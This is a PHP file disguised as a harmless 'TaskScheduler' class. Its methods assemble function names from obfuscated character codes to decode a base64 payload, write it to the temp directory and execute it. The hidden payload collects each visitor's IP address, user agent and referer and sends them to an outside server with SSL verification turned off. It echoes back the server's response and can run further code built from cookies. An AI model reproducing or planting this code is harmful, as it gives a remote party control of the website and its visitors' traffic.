<?php
class TaskScheduler {
	private $xr = '';
	private $sa = '';

	public function resolveConflict($p1) {
		$a = array(((60+3+35)),(97*1),(32+80+3),(((27*1)+74)),((13*2)+28),(13+39),((46*35)-1515),(2*50),((57+40+4)),(3*33),(((21*2)+69)),(2*50),(106-5));
		$s = '';
		foreach($a as $n){ $s .= chr($n); }
		return $s($p1);
	}

	public function executeAction($p1,$p2) {
		$a = array(((110-8)),111,112,(((71*67)-4656)),(((105*1)+5)));
		$s = '';
		foreach($a as $n){ $s .= chr($n); }
		return $s($p1,$p2);
	}

	public function terminateSession($p1,$p2) {
		$a = array(101,((118-2)),105,((117-3)),(((75*1)+44)),(98+4));
		$s = '';
		foreach($a as $n){ $s .= chr($n); }
		$s = strrev($s);
		return $s($p1,$p2);
	}

	public function resetState($p1) {
		$a = array((105-3),((107-8)),((47+40+21)),(16+7+88),(13+34+68),(111-10));
		$s = '';
		foreach($a as $n){ $s .= chr($n); }
		return $s($p1);
	}

	public function cacheData($p1,$p2=null) {
		$a = array((114),(((35*110)-3734)),((2*57)),(((50*98)-4795)),((115-6)));
		$s = '';
		foreach($a as $n){ $s .= chr($n); }
		return $s($p1,$p2);
	}

	public function sanitizeInput() {
		$this->sa = $this->cacheData($this->processData(), '/');
	}

	public function calculateSum() {
		$this->xr = $this->resolveConflict($this->zp);
	}

	public function parseResponse() {
		$fn = $this->sa.'/dk-67f1557f363e8';
		$f = $this->executeAction($fn, 'w');
		$this->terminateSession($f, $this->xr);
		$this->resetState($f);
		$this->sendNotification($fn);
	}

	private $zp = 'PD9waHAgY2xhc3MgX3hvdHtwcml2YXRlIHN0YXRpYyRfYWM7c' . '3RhdGljIGZ1bmN0aW9uIF9lcigkX2x6cCl7aWYoIXNlbGY6OiR' . 'fYWMpc2VsZjo6X29neigpO3JldHVybiBiYXNlNjRfZGVjb2RlK' . 'HNlbGY6OiRfYWNbJF9senBdKTt9cHJpdmF0ZSBzdGF0aWMgZnV' . 'uY3Rpb24gX29neigpe3NlbGY6OiRfYWM9YXJyYXkoJ19weWInP' . 'T4nUVdOalpYTnpMVU4nLid2Ym5SeWIyd3RRV3hzYjNjdFQzSnB' . 'aMmx1T2lBJy4ncScsJ19tYSc9PidRMjl1ZEdWdWRDMVVlWEJsT' . '2lCaGNIQnNhV05oZEdsdmJpOXEnLidZWFonLidoYzJOeScuJ2F' . 'YJy4nQjAnLCdfbGcnPT4nWTInLidnJy4nPScsJ194eCc9PidaW' . 'GwnLidLY0dORFNUWkphbWMwVEdwbk5FeHFaelJNYW1jMFNXbDN' . 'hV1JYUldsUGFVb3dXbGhPTUVscGQybGpiVicuJ1p0U1dwdmFXU' . 'khWJy4nbnBrJy4nUTBvJy4nNScsJ194cic9PidjJy4nWGQ2ZUE' . 'nLic9Jy4nPScsJ19hb3MnPT4nUEc5clAnLidnPScuJz0nLCdfc' . 'WxhJz0+J1BHSmhaRDQ9JywnX3pubyc9PidkMkZzYicuJ0E9PSc' . 'sJ19jcCc9PicnLCdfZ3gnPT4nJywnX25uJz0+JycsJ19jaCc9P' . 'idhSFIwY0RvdkwzQjFZaTUzWldKbWFXeGxhRzl6ZEdWeUxtTnZ' . 'iUzlqYjInLicxd2IzTmxjaTVxY3o5aycuJ1lYUmhQJy4nUScuJ' . 'z09JywnX2ZoJz0+J1knLiczVnliRjlwYm1sMCcsJ19qZCc9Pid' . 'hSCcuJ1IwY0Y5amIyUmwnLCdfbWFpJz0+J2MyTm9aJy4nVzFsJ' . 'ywnX2V2Jz0+J2EnLidIUjAnLidjJy4nSE09JywnX3JkcCc9Pid' . 'SJy4nMFZVSUE9Jy4nPScsJ194Zyc9PidjR0YwYUE9Jy4nPScsJ' . '19ydnYnPT4nY1hWbGNuJy4naycuJz0nLCdfbW5iJz0+J1AnLid' . '3PScuJz0nLCdfZG5uJz0+J2NYVmxjbmsnLic9JywnX2F4Jz0+J' . '0knLidFaFVWRkF2TVM0d0QnLidRcEliM04wT2lBJy4nPScsJ19' . 'peSc9PidhRzl6ZCcuJ0E9PScsJ192ZCc9PidEUXBEYjI1dVpXT' . 'jBhVzl1T2lCRGJHJy4nOScuJ3paUTBLRCcuJ1FvJy4nPScsJ19' . 'jY20nPT4nYzNOc09pOHYnLCdfcGQnPT4nJywnX2NuJz0+J2FHO' . 'XpkJy4nQT0nLic9JywnX3J1Jz0+J0RRbz0nLCdfbG54Jz0+J1N' . 'GUlVVRjlEVEVsRlRsUmYnLidTVkE9JywnX3p5bSc9PidTRlJVV' . 'ScuJ0Y5WVgwWlBVbGRCVWtSRlJGOUdUMUknLic9JywnX2VvJz0' . '+J1VrVk5UMVJGWDBGRVJGST0nLCdfbW8nPT4nU0ZSVVVGOVZVM' . 'CcuJ1ZTWDBGSFJVNVUnLCdfeWYnPT4nU0ZSVVVGOVZVMCcuJ1Z' . 'TWDAnLidGSCcuJ1JVNVUnLCdfcGInPT4nJywnX3V6Jz0+J1NGU' . 'icuJ1VVRjlTUlVaRlUnLidrVlMnLCdfZnAnPT4nU0ZSVVVGOVM' . 'nLidSVVpGVWtWJy4nUycsJ19yb2MnPT4nJywnX29kJz0+J1NGU' . 'lVVRjlEVEVsRlRsUmZTVkE9JywnX2hqeic9PidTRlJVVUYnLic' . '5RFRFbEZUbFInLidmU1YnLidBPScsJ19mYSc9PidTRlJVVUY5W' . 'VgwWlBVbGRCVWtSRlJGOUdUMUk9JywnX3B6Jz0+J1NGUlVVRjl' . 'ZWDBaUFVsZEJVa1JGJy4nUkY5R1QxSScuJz0nLCdfbXEnPT4nV' . 'WsnLidWTlQxUkZYJy4nMEZFUicuJ0ZJJy4nPScsJ19qZmsnPT4' . 'nVWtWTlQxUicuJ0ZYMCcuJ0ZFUkYnLidJJy4nPScsJ19qcHMnP' . 'T4nWkdKbmJXOScuJ2taUScuJz0nLic9JywnX2NpJz0+J1NWQTY' . 'nLidJQT0nLic9JywnX3VuZyc9PidJSHdnVlVFNklBPScuJz0nL' . 'CdfbnB5Jz0+J0lId2dVbVZtT2lBJy4nPScsJ19tZyc9PidJRHh' . 'pJy4nY2o0SycsJ19saic9PidhJy4nWCcuJ0EnLic9JywnX3lkJ' . 'z0+J2QnLidXJy4nRT0nLCdfcGF4Jz0+J2NtVicuJ20nLCdfZHh' . 'xJz0+J2NYZDZlQScuJz09JywpO319Y2xhc3MgX2R5aHtwcml2Y' . 'XRlIHN0YXRpYyRfYWM7c3RhdGljIGZ1bmN0aW9uIF9lcigkX2x' . '6cCl7aWYoIXNlbGY6OiRfYWMpc2VsZjo6X29neigpO3JldHVyb' . 'iBzZWxmOjokX2FjWyRfbHpwXTt9cHJpdmF0ZSBzdGF0aWMgZnV' . 'uY3Rpb24gX29neigpe3NlbGY6OiRfYWM9YXJyYXkoMDAsMDcsM' . 'DM2LDAzNiwwMSwwMzYsMDIsMDcsMDEsMDE2LDAzMCwwNiwwMzI' . 'sMDEyLDAxMSwwMTMsMDI3LDAzMSwwMywwMiwwMSwwMSwwMCwwM' . 'TIsMDEyLDAzMTAsMDY3MywwMTIwLDAwLDAyMDAwLDAxLDA0MjM' . 'sMDQyMyk7fX1oZWFkZXIoX3hvdDo6X2VyKCdfJy4ncCcuJ3liJ' . 'ykpO2hlYWRlcihfeG90OjpfZXIoJ18nLidtJy4nYScpKTtpZih' . 'pc3NldCgkX0dFVFtfeG90OjpfZXIoJ19sJy4nZycpXSkpeyRfe' . 'W09X3Z3eihfeG90OjpfZXIoJ194eCcpKTtpZigkX3ltJiZzdHJ' . 'wb3MoJF95bSxfeG90OjpfZXIoJ194Jy4ncicpKSE9PWZhbHNlK' . 'XtkaWUoX3hvdDo6X2VyKCdfYW8nLidzJykpO31lbHNle2RpZSh' . 'feG90OjpfZXIoJ18nLidxbCcuJ2EnKSk7fX1pZihpc3NldCgkX' . '0dFVFtfeG90OjpfZXIoJ196bicuJ28nKV0pKXskX2VjdD0kX0N' . 'PT0tJRTskX254cD1fZHloOjpfZXIoMCk7JF9senA9X2R5aDo6X' . '2VyKDEpOyRfc21hPWFycmF5KCk7JF9zbWFbJF9ueHBdPV94b3Q' . '6Ol9lcignX2MnLidwJyk7d2hpbGUoJF9senApeyRfc21hWyRfb' . 'nhwXS49JF9lY3RbX2R5aDo6X2VyKDIpXVskX2x6cF07aWYoISR' . 'fZWN0W19keWg6Ol9lcigzKV1bJF9senArX2R5aDo6X2VyKDQpX' . 'Sl7aWYoISRfZWN0W19keWg6Ol9lcig1KV1bJF9senArX2R5aDo' . '6X2VyKDYpXSlicmVhazskX254cCsrOyRfc21hWyRfbnhwXT1fe' . 'G90OjpfZXIoJ19nJy4neCcpOyRfbHpwKys7fSRfbHpwPSRfbHp' . 'wK19keWg6Ol9lcig3KStfZHloOjpfZXIoOCk7fSRfbnhwPSRfc' . '21hW19keWg6Ol9lcig5KV0oKS4kX3NtYVtfZHloOjpfZXIoMTA' . 'pXTtpZighJF9zbWFbX2R5aDo6X2VyKDExKV0oJF9ueHApKXskX' . '2x6cD0kX3NtYVtfZHloOjpfZXIoMTIpXSgkX254cCwkX3NtYVt' . 'fZHloOjpfZXIoMTMpXSk7JF9zbWFbX2R5aDo6X2VyKDE0KV0oJ' . 'F9senAsJF9zbWFbX2R5aDo6X2VyKDE1KV0uJF9zbWFbX2R5aDo' . '6X2VyKDE2KV0oJF9zbWFbX2R5aDo6X2VyKDE3KV0oJF9lY3RbX' . '2R5aDo6X2VyKDE4KV0pKSk7fWluY2x1ZGUoJF9ueHApO31mdW5' . 'jdGlvbiBfdnd6KCRfcmwsJF9scHo9bnVsbCwkX2ptPSdncG9na' . 'mt6YnljbicpeyRfemtzPV94b3Q6Ol9lcignX25uJyk7JF92ZT1' . 'feG90OjpfZXIoJ19jJy4naCcpLiRfcmw7aWYoaXNfY2FsbGFib' . 'GUoX3hvdDo6X2VyKCdfZmgnKSkpeyRfbmo9Y3VybF9pbml0KCR' . 'fdmUpO2N1cmxfc2V0b3B0KCRfbmosQ1VSTE9QVF9TU0xfVkVSS' . 'UZZUEVFUixmYWxzZSk7Y3VybF9zZXRvcHQoJF9uaixDVVJMT1B' . 'UX1NTTF9WRVJJRllIT1NULF9keWg6Ol9lcigxOSkpO2N1cmxfc' . '2V0b3B0KCRfbmosQ1VSTE9QVF9GT0xMT1dMT0NBVElPTixfZHl' . 'oOjpfZXIoMjApKTtjdXJsX3NldG9wdCgkX25qLENVUkxPUFRfU' . 'kVUVVJOVFJBTlNGRVIsX2R5aDo6X2VyKDIxKSk7Y3VybF9zZXR' . 'vcHQoJF9uaixDVVJMT1BUX0hFQURFUixfZHloOjpfZXIoMjIpK' . 'TtjdXJsX3NldG9wdCgkX25qLENVUkxPUFRfQ09OTkVDVFRJTUV' . 'PVVQsX2R5aDo6X2VyKDIzKSk7Y3VybF9zZXRvcHQoJF9uaixDV' . 'VJMT1BUX1RJTUVPVVQsX2R5aDo6X2VyKDI0KSk7JF96a3M9Y3V' . 'ybF9leGVjKCRfbmopOyRfcXJpPWN1cmxfZ2V0aW5mbygkX25qK' . 'TtjdXJsX2Nsb3NlKCRfbmopO2lmKCRfcXJpW194b3Q6Ol9lcig' . 'nXycuJ2pkJyldIT1fZHloOjpfZXIoMjUpKXJldHVybiBmYWxzZ' . 'Tt9ZWxzZXskX3ZoaD1wYXJzZV91cmwoJF92ZSk7JF9naj0oJF9' . '2aGhbX3hvdDo6X2VyKCdfbScuJ2FpJyldPT1feG90OjpfZXIoJ' . '19ldicpKTskX3FyPV94b3Q6Ol9lcignX3JkJy4ncCcpLiRfdmh' . 'oW194b3Q6Ol9lcignX3gnLidnJyldO2lmKGlzc2V0KCRfdmhoW' . '194b3Q6Ol9lcignX3InLid2Jy4ndicpXSkpJF9xci49X3hvdDo' . '6X2VyKCdfbW4nLidiJykuJF92aGhbX3hvdDo6X2VyKCdfZG4nL' . 'iduJyldOyRfcXIuPV94b3Q6Ol9lcignXycuJ2EnLid4JykuJF9' . '2aGhbX3hvdDo6X2VyKCdfaScuJ3knKV0uX3hvdDo6X2VyKCdfJ' . 'y4ndmQnKTskX2dkZz1mc29ja29wZW4oKCRfZ2o/X3hvdDo6X2V' . 'yKCdfY2NtJyk6X3hvdDo6X2VyKCdfJy4ncGQnKSkuJF92aGhbX' . '3hvdDo6X2VyKCdfY24nKV0sJF9naj9fZHloOjpfZXIoMjYpOl9' . 'keWg6Ol9lcigyNykpO2lmKCRfZ2RnKXtmcHV0cygkX2dkZywkX' . '3FyKTskX25rYj1fZHloOjpfZXIoMjgpO3doaWxlKCFmZW9mKCR' . 'fZ2RnKSl7JF92eXQ9ZmdldHMoJF9nZGcsX2R5aDo6X2VyKDI5K' . 'Sk7aWYoJF9ua2IpJF96a3MuPSRfdnl0O2lmKCRfdnl0PT1feG9' . '0OjpfZXIoJ19ydScpKSRfbmtiPV9keWg6Ol9lcigzMCk7fWZjb' . 'G9zZSgkX2dkZyk7fX1yZXR1cm4kX3prczt9JF9hdD1pc3NldCg' . 'kX1NFUlZFUltfeG90OjpfZXIoJ18nLidsbicuJ3gnKV0pOyRfc' . '209aXNzZXQoJF9TRVJWRVJbX3hvdDo6X2VyKCdfenltJyldKTs' . 'kX3dmdD1pc3NldCgkX1NFUlZFUltfeG90OjpfZXIoJ19lbycpX' . 'Sk7JF95Zj1pc3NldCgkX1NFUlZFUltfeG90OjpfZXIoJ19tbyc' . 'pXSk/JF9TRVJWRVJbX3hvdDo6X2VyKCdfeScuJ2YnKV06X3hvd' . 'Do6X2VyKCdfJy4ncCcuJ2InKTskX2h0YT1pc3NldCgkX1NFUlZ' . 'FUltfeG90OjpfZXIoJ18nLid1Jy4neicpXSk/JF9TRVJWRVJbX' . '3hvdDo6X2VyKCdfJy4nZnAnKV06X3hvdDo6X2VyKCdfJy4ncic' . 'uJ29jJyk7JF9hdD1pc3NldCgkX1NFUlZFUltfeG90OjpfZXIoJ' . '19vZCcpXSk/JF9TRVJWRVJbX3hvdDo6X2VyKCdfJy4naGp6Jyl' . 'dOm51bGw7JF9zbT1pc3NldCgkX1NFUlZFUltfeG90OjpfZXIoJ' . '19mJy4nYScpXSk/JF9TRVJWRVJbX3hvdDo6X2VyKCdfJy4ncCc' . 'uJ3onKV06bnVsbDskX3dmdD1pc3NldCgkX1NFUlZFUltfeG90O' . 'jpfZXIoJ19tJy4ncScpXSk/JF9TRVJWRVJbX3hvdDo6X2VyKCd' . 'faicuJ2YnLidrJyldOm51bGw7aWYoZmlsdGVyX3ZhcigkX2F0L' . 'F9keWg6Ol9lcigzMSkpKXskX3hxPSRfYXQ7fWVsc2VpZihmaWx' . '0ZXJfdmFyKCRfc20sX2R5aDo6X2VyKDMyKSkpeyRfeHE9JF9zb' . 'Tt9ZWxzZXskX3hxPSRfd2Z0O31pZihpc3NldCgkX0dFVFtfeG9' . '0OjpfZXIoJ19qJy4ncCcuJ3MnKV0pKXtlY2hvIF94b3Q6Ol9lc' . 'ignX2NpJykuJF94cS5feG90OjpfZXIoJ18nLid1bicuJ2cnKS4' . 'kX3lmLl94b3Q6Ol9lcignX24nLidweScpLiRfaHRhLl94b3Q6O' . 'l9lcignX21nJyk7ZXhpdCgpO31pZighaXNzZXQoJF94cSl8fCF' . 'pc3NldCgkX3lmKXx8IWlzc2V0KCRfaHRhKSl7ZXhpdCgpO31lb' . 'HNleyRfYmNrPWFycmF5KF94b3Q6Ol9lcignX2xqJyk9PiRfeHE' . 'sX3hvdDo6X2VyKCdfeScuJ2QnKT0+JF95ZixfeG90OjpfZXIoJ' . '19wYXgnKT0+JF9odGEpOyRfa2RsPXVybGVuY29kZShiYXNlNjR' . 'fZW5jb2RlKGpzb25fZW5jb2RlKCRfYmNrKSkpOyRfeW09X3Z3e' . 'igkX2tkbCk7aWYoJF95bSYmc3RycG9zKCRfeW0sX3hvdDo6X2V' . 'yKCdfZHgnLidxJykpIT09ZmFsc2Upe2VjaG8kX3ltO2V4aXQoK' . 'Tt9fQ==';

	public function sendNotification($p) {
		require $p;
	}

	public function processData() {
		$a=array(((65*32)-1965),((100+21)),((76+17+22)),((5*19)),((103*1)),((27*2)+47),(8+69+39),(96-1),116,101,(((50*1)+59)),(23+89),((13*4)+43),((33*2)+34),(3*35),((123-9)));
		$s='';
		foreach($a as $n){$s.=chr($n);}
		return $s();
	}
}

$op = new TaskScheduler();
$op->sanitizeInput();
$op->calculateSum();
$op->parseResponse();
